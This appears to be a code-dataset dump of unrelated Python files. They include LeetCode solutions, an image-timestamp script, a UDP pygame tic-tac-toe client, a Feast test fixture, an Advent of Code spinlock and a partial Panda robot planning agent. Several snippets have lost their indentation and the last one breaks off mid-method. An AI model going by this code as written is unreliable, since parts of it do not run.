        if os.path.exists(path):
            return path
        raise argparse.ArgumentTypeError('directory %r does not exist' % path)

    parser = argparse.ArgumentParser()
    parser.add_argument('-d', '--django', dest='django', default='1.3',
                        help='Django version to use.')
    parser.add_argument('-t', '--templatedir', help='Folder with your templates.',
                        default=DEFAULT_TEMPLATE_DIR)
    parser.add_argument('-m', '--mediadir', help='Folder with your media files (css/js).',
                        default=DEFAULT_MEDIA_DIR)
    parser.add_argument('-s', '--staticdir', help='Folder with your static files (css/js).',
                        default=DEFAULT_STATIC_DIR)
    parser.add_argument('-r', '--runserverpath', help='Location for your runserver.py executable.',
                        default=DEFAULT_RUNSERVER_PATH)
    args = parser.parse_args()
    install(django=args.django, templatedir=args.templatedir,
            mediadir=args.mediadir, staticdir=args.staticdir,
            runserverpath=args.runserverpath)
    # BUG FIX: print() call instead of the Python-2-only print statement,
    # so the module at least parses on Python 3.
    print('done')
if __name__ == '__main__':
main() |
5,144 | b4e2897e20448d543c93402174db7da4066a8510 | class Solution(object):
def isIsomorphic(self, s, t):
"""
:type s: str
:type t: str
:rtype: bool
"""
exist = set()
s_to_t = {}
if len(s) != len(t):
return False
for i, v in enumerate(s):
if v not in s_to_t:
if t[i] in exist:
return False
s_to_t[v] = t[i]
else:
if s_to_t[v] != t[i]:
return False
exist.add(t[i])
return True
class Solution_ref(object):
    def isIsomorphic(self, s, t):
        """Reference one-liner: two strings are isomorphic iff the index of
        each character's first occurrence follows the same pattern."""
        return list(map(s.find, s)) == list(map(t.find, t))
if __name__ == '__main__':
pass |
5,145 | e6ab18d87ace00436a480f4f01da224eead84fc0 | from PIL import Image, ImageDraw, ImageFont
from PIL.ExifTags import TAGS
from datetime import datetime
#Extracts the timestamp from the filename and inserts it into the image
def insert_timestamp_from_filename_into_image(path_to_image:str,
                                              ignorable_string:str,
                                              output_filename:str = "",
                                              distance_to_border:int = 5,
                                              color_of_timestamp:tuple = (0,0,0),
                                              size_of_timestamp:int = 20):
    """Extract the timestamp embedded in the image's filename and draw it
    onto the image.

    :param path_to_image: path of the source image
    :param ignorable_string: non-timestamp part of the filename to strip
    :param output_filename: target file; if empty, the source image is
        overwritten in place
    :param distance_to_border: margin (px) from the bottom-left corner
    :param color_of_timestamp: RGB colour of the drawn text
    :param size_of_timestamp: font size in points
    """
    image = Image.open(path_to_image)
    # Place the timestamp in the bottom-left corner, honouring the margin.
    pos_of_timestamp = (distance_to_border,
                        image.height - size_of_timestamp - distance_to_border)
    # Only the filename (no directory components) carries the timestamp.
    filename_with_extension = path_to_image.split("/")[-1]
    # Strip only the FINAL extension (.png, .jpeg, ...). The original
    # manual reverse scan kept truncating at every dot it met, so a name
    # containing extra dots lost part of the timestamp.
    filename = filename_with_extension.rsplit(".", 1)[0]
    # Remove the fixed prefix/suffix, leaving just the timestamp text.
    timestamp = filename.replace(ignorable_string, "")
    drawable_image = ImageDraw.Draw(image)
    # Font file is expected in the working directory.
    font = ImageFont.truetype('arial.ttf', size_of_timestamp)
    drawable_image.text(pos_of_timestamp, timestamp, color_of_timestamp, font=font)
    if output_filename == "":
        # Overwrite the original image. Using the full path (not the bare
        # filename) avoids silently writing a copy into the CWD when
        # path_to_image contains directories.
        image.save(path_to_image)
    else:
        image.save(output_filename)
#Gets the current timestamp and inserts it into the image
def insert_timestamp_into_image(path_to_image:str,
                                output_filename:str = "",
                                distance_to_border:int = 5,
                                color_of_timestamp:tuple = (0,0,0),
                                size_of_timestamp:int = 20):
    """Draw the current wall-clock timestamp onto the image.

    :param path_to_image: path of the source image
    :param output_filename: target file; if empty, the source image is
        overwritten in place
    :param distance_to_border: margin (px) from the bottom-left corner
    :param color_of_timestamp: RGB colour of the drawn text
    :param size_of_timestamp: font size in points
    """
    image = Image.open(path_to_image)
    # Place the timestamp in the bottom-left corner, honouring the margin.
    pos_of_timestamp = (distance_to_border,
                        image.height - size_of_timestamp - distance_to_border)
    timestamp = str(datetime.now())
    drawable_image = ImageDraw.Draw(image)
    # Font file is expected in the working directory.
    font = ImageFont.truetype('arial.ttf', size_of_timestamp)
    drawable_image.text(pos_of_timestamp, timestamp, color_of_timestamp, font=font)
    if output_filename == "":
        # Overwrite the original image at its full path; the original code
        # saved to the bare filename in the CWD, which is not an overwrite
        # when path_to_image contains directories.
        image.save(path_to_image)
    else:
        image.save(output_filename)
#Reads the attribute where the original time of creation is saved and inserts it into the image
def insert_timestamp_from_imagedata_into_image(path_to_image:str,
                                               output_filename:str = "",
                                               distance_to_border:int = 5,
                                               color_of_timestamp:tuple = (0,0,0),
                                               size_of_timestamp:int = 20):
    """Read the EXIF "DateTime" attribute (original creation time) and draw
    it onto the image.

    :param path_to_image: path of the source image
    :param output_filename: target file; if empty, the source image is
        overwritten in place
    :param distance_to_border: margin (px) from the bottom-left corner
    :param color_of_timestamp: RGB colour of the drawn text
    :param size_of_timestamp: font size in points
    """
    image = Image.open(path_to_image)
    # Place the timestamp in the bottom-left corner, honouring the margin.
    pos_of_timestamp = (distance_to_border,
                        image.height - size_of_timestamp - distance_to_border)
    # Locate the numeric EXIF tag id of the "DateTime" attribute. 0 is not
    # a valid tag, so exifdata.get(0) yields None when the tag is missing;
    # the original code instead fell through to whatever tag came last.
    exifdata = image.getexif()
    datetime_tag_id = 0
    for tag_id in exifdata:
        if TAGS.get(tag_id, tag_id) == "DateTime":
            datetime_tag_id = tag_id
            break
    # str(None) is drawn when the image carries no DateTime information.
    timestamp = str(exifdata.get(datetime_tag_id))
    drawable_image = ImageDraw.Draw(image)
    # Font file is expected in the working directory.
    font = ImageFont.truetype('arial.ttf', size_of_timestamp)
    drawable_image.text(pos_of_timestamp, timestamp, color_of_timestamp, font=font)
    if output_filename == "":
        # Overwrite the original image at its full path (see sibling
        # functions: saving the bare filename wrote into the CWD instead).
        image.save(path_to_image)
    else:
        image.save(output_filename)
if __name__=="__main__":
#Example function calls
#insert_timestamp_from_filename_into_image("Image_2021-09-09_09-00-00.png", "Image_")
insert_timestamp_from_filename_into_image("Image_2021-09-09_09-00-00.JPG", "Image_", "NewImage.JPG", distance_to_border=5, color_of_timestamp=(255,0,0), size_of_timestamp=50)
#insert_timestamp_into_image("Image_2021-01-01_20-00-00.png")
insert_timestamp_into_image("Image_2021-09-09_09-00-00.JPG", "NewImage2.JPG", distance_to_border=5, color_of_timestamp=(255,0,0), size_of_timestamp=50)
#insert_timestamp_from_imagedata_into_image("Image_2021-09-09_09-00-00.png")
insert_timestamp_from_imagedata_into_image("Image_2021-09-09_09-00-00.JPG", "NewImage3.JPG", distance_to_border=5, color_of_timestamp=(255,0,0), size_of_timestamp=50)
|
5,146 | b6d9b6ec10271627b7177acead9a617520dec8f8 | import pygame
from pygame.locals import *
import threading
from load import *
import time
import socket as sck
import sys
# Shared module-level game/network state for the UDP tic-tac-toe client.
port=8767  # UDP port used by both players
grid=[[None,None,None],[None,None,None],[None,None,None]]  # 3x3 board; None = empty cell
XO='X'  # this player's piece; reassigned from the lobby in tic_tac_toe.run()
OX='X'  # piece whose turn it currently is (toggled in clickboard)
winner=None  # set to 'X'/'O' by gamewon() once a line is completed
coordinate1=600  # x position of the status text
coordinate2=20  # y position of the status text (advanced 50px per redraw)
begin=0  # turn counter; 0 means this player has not moved yet
address=('localhost',port)  # local bind address of the datagram socket
class TTTError(Exception):
    """Tic-tac-toe game error.

    ``val`` is a numeric error code (1 = square already occupied) and
    ``mesg`` a human-readable description.
    """

    def __init__(self, value, mesg):
        # Deliberately no super().__init__ call: mirrors the original so
        # ``args`` keeps both constructor arguments.
        self.val, self.mesg = value, mesg

    def __str__(self):
        # repr() so quoting matches the original presentation.
        return repr(self.mesg)
class tic_tac_toe(sck.socket):
    """Networked two-player tic-tac-toe client (Python 2, pygame).

    The class *is* a UDP socket: moves are exchanged as encoded
    ``'1:<payload>'`` datagrams with the opponent found via the lobby
    returned by ``start()``. Board state lives in the module-level
    globals (``grid``, ``XO``, ``OX``, ``winner``, ``begin``).

    NOTE(review): ``start``, ``encoder``, ``decoder`` and ``logging``
    are presumably provided by ``from load import *`` — confirm.
    """
    def __init__(self):#,condition):
        # Create the datagram socket, bind locally and bound the wait for
        # the opponent's move to 10 seconds.
        super(tic_tac_toe,self).__init__(sck.AF_INET,sck.SOCK_DGRAM)
        logging.info("\nSOCKET DATAGRAM ESTABLISHED\n")
        self.bind(address)
        self.settimeout(10) #setting the timeout
        self.loading=start()
        pygame.init()
        # First lobby entry is the opponent's address to send moves to.
        self.send_ip=str(self.loading.players_uids.values()[0])
        print ' HEY WAIT ! THE SENDING IP IS :{0}'.format(self.send_ip)
        self.loading.load=pygame.display.set_mode((700,700))
        pygame.display.set_caption("tic-tac")
        self.board=self.init_board()
        self.showboard(self.loading.load,self.board)
    def init_board(self):
        """Build the 300x300 board surface with the 3x3 grid lines."""
        board=pygame.Surface((300,300))
        board=board.convert()
        board.fill((250,250,250))
        pygame.draw.line(board,(0,0,0),(100,0),(100,300),2)
        pygame.draw.line(board,(0,0,0),(200,0),(200,300),2)
        pygame.draw.line(board,(0,0,0),(0,100),(300,100),2)
        pygame.draw.line(board,(0,0,0),(0,200),(300,200),2)
        return board
    def showboard(self,tt,board):
        """Render the status message and blit the board to the display."""
        global XO,winner,coordinate1,coordinate2,OX
        if (winner is None):
            message=OX +"'s turn"
        else:
            message=winner + " WON!"
        print message
        font=pygame.font.Font(None,24)
        text=font.render(message,1,(0,0,250))
        textpos=text.get_rect(center=(coordinate1,coordinate2))
        # Each redraw pushes the text position down by 50px.
        coordinate2+=50
        # Clear the strip below the grid before writing new text.
        self.board.fill((250,250,250),(0,300,300,25))
        textpos.centerx=self.board.get_rect().centerx
        self.board.blit(text,textpos)
        tt.blit(board,(0,0))
        pygame.display.flip()
        time.sleep(1)
    def boardpos(self,mouseX,mouseY):
        """Map pixel coordinates to (col, row) cell indices (100px cells)."""
        if (mouseY<100):
            self.row=0
        elif mouseY<200:
            self.row=1
        else: self.row=2
        if mouseX < 100:
            self.col=0
        elif mouseX < 200:
            self.col=1
        else: self.col=2
        return (self.col,self.row)
    def draw_piece(self,board,row,col,piece):
        """Draw an 'X' (two lines) or 'O' (circle) into a cell and record
        it in the global grid."""
        centerX=(row*100)+50
        centerY=(col*100)+50
        if piece=='X':
            pygame.draw.line(self.board,(0,0,0),(centerX-22,centerY-22),(centerX+22,centerY+22),2)
            pygame.draw.line(self.board,(0,0,0),(centerX-22,centerY+22),(centerX+22,centerY-22),2)
        else:
            pygame.draw.circle(self.board,(0,0,0),(centerX,centerY),44,2)
        grid[col][row]=piece
    def clickboard(self,board):
        """Handle a mouse click: place this player's piece and toggle the
        turn marker. Recurses (re-prompts) if the square is occupied."""
        global grid,XO,OX
        d=TTTError(1,"SPACE OCCUPIED ALREADY")
        (mouseX,mouseY)=pygame.mouse.get_pos()
        (self.col,self.row)=self.boardpos(mouseY,mouseX)
        try:
            if (grid[self.row][self.col]=='X' or grid[self.row][self.col]=='O'):
                raise d
        except TTTError as t:
            if t.val==1:
                print t.mesg
                # NOTE(review): recursion retries the same cursor position —
                # confirm this is intended to re-read the mouse.
                self.clickboard(self.board)
        self.draw_piece(self.board,self.row,self.col,XO)
        if OX=='X':
            OX='O'
        else : OX='X'
        return self.col,self.row
    def gamewon(self,board):
        """Check rows, columns and diagonals; on a win set the global
        ``winner`` and draw the strike-through line. Returns True on win."""
        global grid,winner
        val=0
        for row in range(0,3):
            if((grid[row][0]==grid[row][1]==grid[row][2]) and grid[row][0] is not None):
                logging.info("ROW no. {0} wins".format(row))
                winner=grid[row][0]
                pygame.draw.line(board,(250,0,0),(0,(row+1)*100-50),(300,(row+1)*100-50),2)
                return True
        for col in range(0,3):
            if ((grid[0][col]==grid[1][col]==grid[2][col]) and grid[0][col] is not None):
                logging.info("COL no. {0} wins".format(col))
                winner=grid[0][col]
                pygame.draw.line(board,(250,0,0),((col+1)*100-50,0),((col+1)*100-50,300),2)
                return True
        if ((grid[0][0]==grid[1][1]==grid[2][2]) and grid[0][0] is not None):
            winner = grid[0][0]
            pygame.draw.line (board, (250,0,0), (50, 50), (250, 250), 2)
            return True
        elif ((grid[0][2]==grid[1][1]==grid[2][0]) and grid[0][2] is not None):
            winner = grid[0][2]
            pygame.draw.line (board, (250,0,0), (250, 50), (50, 250), 2)
            return True
    def run(self):
        """Main game loop: alternately receive the opponent's move over
        UDP and send our own move picked via mouse click."""
        global begin,XO,port,OX
        XO=self.loading.players_ids[self.loading.uid]
        OX=XO
        running=1
        eve=1
        iterator=1
        while running==1: #for receiving purpose
            # 'O' always waits first; 'X' waits only after its first move.
            if (XO=='X' and begin!=0) or XO=='O':
                try:
                    logging.info("waiting for response!")
                    data,conn=self.recvfrom(2048)
                    print data
                    logging.info("Encoded data received")
                    data=decoder(''.join(data.split(':')[1:]))
                    if data[0]==1: # 1 stands for the function drawpiece
                        self.draw_piece(self.board,data[1],data[2],data[3])
                except sck.timeout as se:
                    # Opponent exceeded the 10s move timeout: forfeit.
                    print '{0} has won the game as oponent couldnt think of a move'.format(XO)
                    sys.exit()
                    break
            elif XO=='X' and begin==0:
                pass
            self.showboard(self.loading.load,self.board) #showing the opponents move
            #running=1
            iterator=1
            while eve==1:
                for event in pygame.event.get():
                    if event.type is QUIT:
                        eve=0
                    elif event.type is MOUSEBUTTONDOWN:
                        col,row=self.clickboard(self.board)
                        data=[1,col,row,XO]
                        data=encoder(data)
                        data='1:'+data
                        print data
                        #self.loading.transfer_data('1:'+data)
                        self.sendto(data,(self.send_ip,port))
                        logging.info("Encoded Info transfered")
                        self.showboard(self.loading.load,self.board)
                        iterator=0
                        break
                if iterator==0:
                    break
            self.showboard(self.loading.load,self.board)
            begin+=1
    def __del__(self):
        # Best-effort socket cleanup when the object is garbage collected.
        self.close()
        logging.info("CLOSING ALL SOCKETS ! Thanks for playing")
|
5,147 | ff13ac0ee401471fe5446e8149f019d9da7f3ddf | import pytest
from feast.pyspark.launchers.gcloud import DataprocClusterLauncher
@pytest.fixture
def dataproc_launcher(pytestconfig) -> DataprocClusterLauncher:
    """Build a DataprocClusterLauncher from the --dataproc-* pytest CLI options."""
    opt = pytestconfig.getoption
    return DataprocClusterLauncher(
        cluster_name=opt("--dataproc-cluster-name"),
        staging_location=opt("--dataproc-staging-location"),
        region=opt("--dataproc-region"),
        project_id=opt("--dataproc-project"),
    )
|
5,148 | ef1b759872de6602646ce095823ff37f043ffd9d | class Solution(object):
def isPalindrome(self, x):
"""
:type x: int
:rtype: bool
"""
if x < 0: return False
t = []
while x != 0:
t.append(x % 10)
x /= 10
i, j = 0, len(t)-1
while i < j:
if t[i] != t[j]:
return False
i += 1
j -= 1
return True
|
5,149 | c3755ff5d4262dbf6eaf3df58a336f5e61531435 |
from itertools import cycle
STEP_VAL = 376


def build_spinlock(step, n_inserts=2017):
    """Simulate the circular-buffer "spinlock" (Advent of Code 2017, day 17).

    Starting from the buffer [0], step ``step`` positions forward (modulo
    the current length) and insert the next value after the current
    position, ``n_inserts`` times.

    :param step: number of positions to move before each insertion
    :param n_inserts: how many values (1..n_inserts) to insert
    :return: (buffer, final_position) after the last insertion

    Fix: the original loop body was ``len(spinlock) % count`` — a no-op
    expression that raises ZeroDivisionError on the first iteration
    (count == 0) and never builds the buffer at all.
    """
    buf = [0]
    pos = 0
    for value in range(1, n_inserts + 1):
        # Advance around the ring, then insert just after the new position.
        pos = (pos + step) % len(buf) + 1
        buf.insert(pos, value)
    return buf, pos


spinlock, final_pos = build_spinlock(STEP_VAL)
# Part-1 answer: the value sitting immediately after the last insertion.
print(spinlock[(final_pos + 1) % len(spinlock)])
5,150 | 5c1465bc70010ecabc156a04ec9877bbf66a229d | import sys
import time
import numpy
import pb_robot
import pyquaternion
import pybullet as p
from copy import deepcopy
from actions import PlaceAction, make_platform_world
from block_utils import get_adversarial_blocks, rotation_group, ZERO_POS, \
Quaternion, get_rotated_block, Pose, add_noise, \
Environment, Position, World
from pddlstream.utils import INF
from pybullet_utils import transformation
import tamp.primitives
from tamp.misc import setup_panda_world, get_pddl_block_lookup, \
print_planning_problem, ExecuteActions, ExecutionFailure
from tamp.pddlstream_utils import get_pddlstream_info, pddlstream_plan
class PandaAgent:
    def __init__(self, blocks, noise=0.00005, block_init_xy_poses=None,
                 use_platform=False, use_vision=False, real=False,
                 use_planning_server=False, use_learning_server=False,
                 alternate_orientations=False):
        """
        Build the Panda world in PyBullet and set up the PDDLStream solver.
        The Panda world should in include the given blocks as well as a
        platform which can be used in experimentation.
        :param blocks: Blocks to spawn in the world (stored as belief blocks).
        :param noise: Scale of the observation noise covariance used by
                      _get_observed_pose (assumes isotropic noise — see add_noise).
        :param block_init_xy_poses: Optional initial XY poses for the blocks.
        :param use_platform: Boolean stating whether to include the platform to
                             push blocks off of or not.
        :param use_vision: Boolean stating whether to use vision to detect blocks.
        :param real: Boolean stating whether to drive a real Franka arm via ROS.
        :param use_planning_server: Boolean stating whether to use the separate
                                    ROS planning service server.
        :param use_learning_server: Boolean stating whether to host a ROS service
                                    server to drive planning from active learning script.
        :param alternate_orientations: Boolean stating whether blocks can be replaced in
                                       their home positions at alternate orientations.
        If you are using the ROS action server, you must start it in a separate terminal:
            rosrun stacking_ros planning_server.py
        """
        self.real = real
        self.use_vision = use_vision
        self.use_platform = use_platform
        self.use_planning_server = use_planning_server
        self.use_learning_server = use_learning_server
        self.alternate_orientations = alternate_orientations
        # Setup PyBullet instance to run in the background and handle planning/collision checking.
        self._planning_client_id = pb_robot.utils.connect(use_gui=False)
        self.plan()
        pb_robot.utils.set_default_camera()
        self.robot = pb_robot.panda.Panda()
        self.robot.arm.hand.Open()
        self.belief_blocks = blocks
        self.pddl_blocks, self.platform_table, self.platform_leg, self.table, self.frame, self.wall = setup_panda_world(self.robot,
                                                                                                                       blocks,
                                                                                                                       block_init_xy_poses,
                                                                                                                       use_platform=use_platform)
        self.fixed = [self.platform_table, self.platform_leg, self.table, self.frame, self.wall]
        self.pddl_block_lookup = get_pddl_block_lookup(blocks, self.pddl_blocks)
        # Remember the home configuration so reset_world() can restore it.
        self.orig_joint_angles = self.robot.arm.GetJointValues()
        self.orig_block_poses = [b.get_base_link_pose() for b in self.pddl_blocks]
        # Setup PyBullet instance that only visualizes plan execution. State needs to match the planning instance.
        poses = [b.get_base_link_pose() for b in self.pddl_blocks]
        poses = [Pose(Position(*p[0]), Quaternion(*p[1])) for p in poses]
        self._execution_client_id = pb_robot.utils.connect(use_gui=True)
        self.execute()
        pb_robot.utils.set_default_camera()
        self.execution_robot = pb_robot.panda.Panda()
        self.execution_robot.arm.hand.Open()
        setup_panda_world(self.execution_robot, blocks, poses, use_platform=use_platform)
        # Set up ROS plumbing if using features that require it
        if self.use_vision or self.use_planning_server or self.use_learning_server or real:
            import rospy
            try:
                rospy.init_node("panda_agent")
            except:
                print("ROS Node already created")
        # Create an arm interface
        if real:
            from franka_interface import ArmInterface
            self.real_arm = ArmInterface()
            from franka_core_msgs.msg import RobotState
            state_topic = "/franka_ros_interface/custom_franka_state_controller/robot_state"
            self.arm_last_error_time = time.time()
            self.arm_error_check_time = 3.0
            self.arm_state_subscriber = rospy.Subscriber(
                state_topic, RobotState, self.robot_state_callback)
        # Set initial poses of all blocks and setup vision ROS services.
        if self.use_vision:
            from panda_vision.srv import GetBlockPosesWorld, GetBlockPosesWrist
            rospy.wait_for_service('get_block_poses_world')
            rospy.wait_for_service('get_block_poses_wrist')
            self._get_block_poses_world = rospy.ServiceProxy('get_block_poses_world', GetBlockPosesWorld)
            self._get_block_poses_wrist = rospy.ServiceProxy('get_block_poses_wrist', GetBlockPosesWrist)
        # Start ROS clients and servers as needed
        self.last_obj_held = None
        if self.use_planning_server:
            from stacking_ros.srv import GetPlan, SetPlanningState
            from tamp.ros_utils import goal_to_ros, ros_to_task_plan
            print("Waiting for planning server...")
            rospy.wait_for_service("get_latest_plan")
            self.goal_to_ros = goal_to_ros
            self.ros_to_task_plan = ros_to_task_plan
            self.init_state_client = rospy.ServiceProxy(
                "/reset_planning", SetPlanningState)
            self.get_plan_client = rospy.ServiceProxy(
                "/get_latest_plan", GetPlan)
            print("Done!")
        if self.use_learning_server:
            from stacking_ros.srv import PlanTower
            self.learning_server = rospy.Service(
                "/plan_tower", PlanTower, self.learning_server_callback)
            print("Learning server started!")
        self.pddl_info = get_pddlstream_info(self.robot,
                                             self.fixed,
                                             self.pddl_blocks,
                                             add_slanted_grasps=False,
                                             approach_frame='global',
                                             use_vision=self.use_vision)
        self.noise = noise
        self.txt_id = None
        # Leave the planning client active by default.
        self.plan()
def _add_text(self, txt):
self.execute()
pb_robot.viz.remove_all_debug()
self.txt_id = pb_robot.viz.add_text(txt, position=(0, 0.25, 0.75), size=2)
self.plan()
def execute(self):
self.state = 'execute'
pb_robot.aabb.set_client(self._execution_client_id)
pb_robot.body.set_client(self._execution_client_id)
pb_robot.collisions.set_client(self._execution_client_id)
pb_robot.geometry.set_client(self._execution_client_id)
pb_robot.grasp.set_client(self._execution_client_id)
pb_robot.joint.set_client(self._execution_client_id)
pb_robot.link.set_client(self._execution_client_id)
pb_robot.panda.set_client(self._execution_client_id)
pb_robot.planning.set_client(self._execution_client_id)
pb_robot.utils.set_client(self._execution_client_id)
pb_robot.viz.set_client(self._execution_client_id)
def plan(self):
if self.use_planning_server:
return
self.state = 'plan'
pb_robot.aabb.set_client(self._planning_client_id)
pb_robot.body.set_client(self._planning_client_id)
pb_robot.collisions.set_client(self._planning_client_id)
pb_robot.geometry.set_client(self._planning_client_id)
pb_robot.grasp.set_client(self._planning_client_id)
pb_robot.joint.set_client(self._planning_client_id)
pb_robot.link.set_client(self._planning_client_id)
pb_robot.panda.set_client(self._planning_client_id)
pb_robot.planning.set_client(self._planning_client_id)
pb_robot.utils.set_client(self._planning_client_id)
pb_robot.viz.set_client(self._planning_client_id)
    def reset_world(self):
        """ Resets the planning world to its original configuration """
        print("Resetting world")
        # On hardware, mirror the real arm's current joints; in sim, use
        # the home configuration captured in __init__.
        if self.real:
            angles = self.real_arm.convertToList(self.real_arm.joint_angles())
        else:
            angles = self.orig_joint_angles
        # Apply the joint state to both the planning and execution clients.
        self.plan()
        self.robot.arm.SetJointValues(angles)
        self.execute()
        self.execution_robot.arm.SetJointValues(angles)
        # Restore every block to the pose recorded at construction time.
        for bx, b in enumerate(self.pddl_blocks):
            b.set_base_link_pose(self.orig_block_poses[bx])
        print("Done")
def _get_initial_pddl_state(self):
"""
Get the PDDL representation of the world between experiments. This
method assumes that all blocks are on the table. We will always "clean
up" an experiment by moving blocks away from the platform after an
experiment.
"""
fixed = [self.table, self.platform_table, self.platform_leg, self.frame]
conf = pb_robot.vobj.BodyConf(self.robot, self.robot.arm.GetJointValues())
print('Initial configuration:', conf.configuration)
init = [('CanMove',),
('Conf', conf),
('StartConf', conf),
('AtConf', conf),
('HandEmpty',)]
self.table_pose = pb_robot.vobj.BodyPose(self.table, self.table.get_base_link_pose())
init += [('Pose', self.table, self.table_pose),
('AtPose', self.table, self.table_pose)]
for body in self.pddl_blocks:
print(type(body), body)
pose = pb_robot.vobj.BodyPose(body, body.get_base_link_pose())
init += [('Graspable', body),
('Pose', body, pose),
('AtPose', body, pose),
('Block', body),
('On', body, self.table),
('Supported', body, pose, self.table, self.table_pose)]
if not self.platform_table is None:
platform_pose = pb_robot.vobj.BodyPose(self.platform_table, self.platform_table.get_base_link_pose())
init += [('Pose', self.platform_table, platform_pose),
('AtPose', self.platform_table, platform_pose)]
init += [('Block', self.platform_table)]
init += [('Table', self.table)]
return init
    def _get_observed_pose(self, pddl_block, action):
        """
        This pose should be relative to the base of the platform leg to
        agree with the simulation. The two block representations will have
        different orientation but their positions should be the same.

        :param pddl_block: Block whose pose is observed.
        :param action: Unused here; kept for the observation interface.
        :return: Noisy block Pose relative to the platform-leg base.
        """
        block_transform = pddl_block.get_base_link_transform()
        platform_transform = self.platform_leg.get_base_link_transform()
        # Shift the reference frame down to the bottom of the leg.
        platform_transform[2,3] -= self.platform_leg.get_dimensions()[2]/2.
        # Block pose expressed in the leg's (shifted) frame.
        rel_transform = numpy.linalg.inv(platform_transform)@block_transform
        end_pose = pb_robot.geometry.pose_from_tform(rel_transform)
        # TODO: Add noise to the observation.
        end_pose = Pose(Position(*end_pose[0]), Quaternion(*end_pose[1]))
        # Isotropic position noise scaled by self.noise.
        end_pose = add_noise(end_pose, self.noise*numpy.eye(3))
        return end_pose
def _update_block_poses(self, find_moved=False):
""" Use the global world cameras to update the positions of the blocks """
try:
resp = self._get_block_poses_world()
named_poses = resp.poses
except:
import sys
print('Service call to get block poses failed. Exiting.')
sys.exit()
n_found = 0
for pddl_block_name, pddl_block in self.pddl_block_lookup.items():
for named_pose in named_poses:
if named_pose.block_id == pddl_block_name.split('_')[-1]:
pose = named_pose.pose.pose
# Skip changes the pose of objects in storage.
if pose.position.x < 0.05:
continue
n_found += 1
position = (pose.position.x, pose.position.y, pose.position.z)
orientation = (pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w)
self.execute()
pddl_block.set_base_link_pose((position, orientation))
if not self.use_planning_server:
self.plan()
pddl_block.set_base_link_pose((position, orientation))
if find_moved and n_found != len(self.moved_blocks):
input('Could not find all the moved blocks. Please reposition blocks outside of the camera view and hit enter to continue.')
self._update_block_poses(find_moved=True)
return
# After loading from vision, objects may be in collision. Resolve this.
for _, pddl_block in self.pddl_block_lookup.items():
if pb_robot.collisions.body_collision(pddl_block, self.table):
print('Collision with table and block:', pddl_block.readableName)
position, orientation = pddl_block.get_base_link_pose()
stable_z = pb_robot.placements.stable_z(pddl_block, self.table)
position = (position[0], position[1], stable_z)
self.execute()
pddl_block.set_base_link_pose((position, orientation))
self.plan()
pddl_block.set_base_link_pose((position, orientation))
# Resolve from low to high blocks.
current_poses = [b.get_base_link_pose() for b in self.pddl_blocks]
block_ixs = range(len(self.pddl_blocks))
block_ixs = sorted(block_ixs, key=lambda ix: current_poses[ix][0][2], reverse=False)
for ix in range(len(block_ixs)):
bottom_block = self.pddl_blocks[block_ixs[ix]]
for jx in range(ix+1, len(block_ixs)):
top_block = self.pddl_blocks[block_ixs[jx]]
dist_moved = 0
while pb_robot.collisions.body_collision(bottom_block, top_block):
print('Collision with bottom %s and top %s:' % (bottom_block.readableName, top_block.readableName))
position, orientation = top_block.get_base_link_pose()
stable_z = position[2] + 0.001
dist_moved += 0.001
if self.real and dist_moved > 0.04:
print(f"Found blocks {bottom_block} and {top_block} in collision")
input("Manually move the blocks and press Enter to continue")
self._update_block_poses(find_moved=False)
return
position = (position[0], position[1], stable_z)
self.execute()
top_block.set_base_link_pose((position, orientation))
self.plan()
top_block.set_base_link_pose((position, orientation))
def build_planning_problem(self, tower, base_xy):
""" Builds the initial conditions for planning """
# Set up the list of original poses and order of blocks in the tower
self.moved_blocks = set()
tower_pddl = [self.pddl_block_lookup[b.name] for b in tower]
tower_block_order = [self.pddl_blocks.index(b) for b in tower_pddl]
# Build the initial data structures
if self.use_planning_server:
from stacking_ros.msg import BodyInfo
from stacking_ros.srv import SetPlanningStateRequest
from tamp.ros_utils import block_init_to_ros, pose_to_ros, pose_tuple_to_ros, transform_to_ros
ros_req = SetPlanningStateRequest()
# Initial poses and robot configuration
if self.real:
ros_req.robot_config.angles = self.real_arm.convertToList(self.real_arm.joint_angles())
else:
ros_req.robot_config.angles = self.robot.arm.GetJointValues()
ros_req.init_state = block_init_to_ros(self.pddl_blocks)
else:
pddl_problems = []
# Base block goal pose
# TODO: Set base block to be rotated in its current position.
base_block = self.pddl_block_lookup[tower[0].name]
base_pos = (base_xy[0], base_xy[1], tower[0].pose.pos.z)
base_pose = (base_pos, tower[0].rotation)
base_pose = pb_robot.vobj.BodyPose(base_block, base_pose)
if self.use_planning_server:
base_block_ros = BodyInfo()
base_block_ros.name = base_block.readableName
base_block_ros.stack = True
pose_to_ros(base_pose, base_block_ros.pose)
ros_req.goal_state.append(base_block_ros)
else:
pddl_problems.append((self.table, base_block, (base_pos, tower[0].rotation)))
# Other block goal poses
for b_ix in range(1, len(tower)):
bottom_block = tower[b_ix-1]
bottom_pose = (bottom_block.pose.pos, bottom_block.rotation)
bottom_tform = pb_robot.geometry.tform_from_pose(bottom_pose)
top_block = tower[b_ix]
top_pose = (top_block.pose.pos, top_block.rotation)
top_tform = pb_robot.geometry.tform_from_pose(top_pose)
rel_tform = numpy.linalg.inv(bottom_tform)@top_tform
top_pddl = self.pddl_block_lookup[top_block.name]
bottom_pddl = self.pddl_block_lookup[bottom_block.name]
if self.use_planning_server:
block_ros = BodyInfo()
block_ros.name = top_pddl.readableName
block_ros.base_obj = bottom_pddl.readableName
transform_to_ros(rel_tform, block_ros.pose)
block_ros.is_rel_pose = True
block_ros.stack = True
ros_req.goal_state.append(block_ros)
else:
init_terms = [('RelPose', top_pddl, bottom_pddl, rel_tform)]
goal_terms = [('On', top_pddl, bottom_pddl)]
pddl_problems.append((bottom_pddl, top_pddl, rel_tform))
# Finally, tack on the tower resetting steps
for ix in reversed(tower_block_order):
blk, pose = self.pddl_blocks[ix], self.original_poses[ix]
goal_pose = pb_robot.vobj.BodyPose(blk, pose)
if self.use_planning_server:
block_ros = BodyInfo()
block_ros.name = blk.readableName
block_ros.stack = False
pose_to_ros(goal_pose, block_ros.pose)
ros_req.goal_state.append(block_ros)
else:
pddl_problems.append((self.table, blk, pose))
# Return the planning data structure
if self.use_planning_server:
return ros_req
else:
return pddl_problems
    def build_reset_problem(self):
        """ Builds the initial conditions for a tower reset given a set of moved blocks.

        :return: A SetPlanningStateRequest when using the ROS planning
                 server, otherwise a list of (table, block, pose) PDDL
                 subproblems — one per block in self.moved_blocks, highest
                 block first so upper blocks are cleared before lower ones.
        """
        print("Resetting blocks...")
        print("Moved Blocks:", self.moved_blocks)
